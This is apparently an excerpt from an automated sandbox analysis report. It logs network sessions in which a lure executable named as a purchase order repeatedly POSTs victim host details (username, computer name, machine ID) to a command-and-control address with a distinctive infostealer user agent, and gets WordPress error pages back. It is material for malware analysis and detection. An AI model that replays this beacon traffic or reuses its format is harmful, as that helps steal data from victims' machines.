                        Aug 29, 2024 12:04:47.287744045 CEST8049767104.248.205.66192.168.2.8
                        Aug 29, 2024 12:04:47.287945032 CEST4976780192.168.2.8104.248.205.66
                        Aug 29, 2024 12:04:47.290076971 CEST4976780192.168.2.8104.248.205.66
                        Aug 29, 2024 12:04:47.294985056 CEST8049767104.248.205.66192.168.2.8
                        Aug 29, 2024 12:04:47.295064926 CEST4976780192.168.2.8104.248.205.66
                        Aug 29, 2024 12:04:47.301003933 CEST8049767104.248.205.66192.168.2.8
                        Aug 29, 2024 12:04:49.551826000 CEST8049767104.248.205.66192.168.2.8
                        Aug 29, 2024 12:04:49.551848888 CEST8049767104.248.205.66192.168.2.8
                        Aug 29, 2024 12:04:49.551867008 CEST8049767104.248.205.66192.168.2.8
                        Aug 29, 2024 12:04:49.551881075 CEST8049767104.248.205.66192.168.2.8
                        Aug 29, 2024 12:04:49.551950932 CEST4976780192.168.2.8104.248.205.66
                        Aug 29, 2024 12:04:49.552021027 CEST4976780192.168.2.8104.248.205.66
                        Aug 29, 2024 12:04:49.552090883 CEST4976780192.168.2.8104.248.205.66
                        Aug 29, 2024 12:04:49.556924105 CEST8049767104.248.205.66192.168.2.8
                        • 104.248.205.66
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.849713104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:02:51.192383051 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 180
                        Connection: close
                        Aug 29, 2024 12:02:51.197441101 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: 'ckav.ruhubert813848HUBERT-PCk0FDD42EE188E931437F4FBE2C1y2PQ
                        Aug 29, 2024 12:02:53.421875000 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:02:51 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:02:53.421946049 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:02:53.422004938 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.849714104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:02:53.563101053 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 180
                        Connection: close
                        Aug 29, 2024 12:02:53.568454027 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: 'ckav.ruhubert813848HUBERT-PC+0FDD42EE188E931437F4FBE2Co2Qly
                        Aug 29, 2024 12:02:56.010449886 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:02:54 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:02:56.010462046 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:02:56.010476112 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:02:56.010531902 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.849715104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:02:56.080645084 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:02:56.085560083 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:02:58.527046919 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:02:56 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:02:58.527065039 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:02:58.527076006 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.849716104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:02:58.669652939 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:02:58.674545050 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:00.883568048 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:02:59 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:00.883584976 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:03:00.883604050 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:03:00.883615017 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.849723104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:01.033493042 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:01.038490057 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:03.415740967 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:01 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:03.415772915 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:03.415788889 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.849725104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:03.560518026 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:03.565316916 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:05.911005974 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:04 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
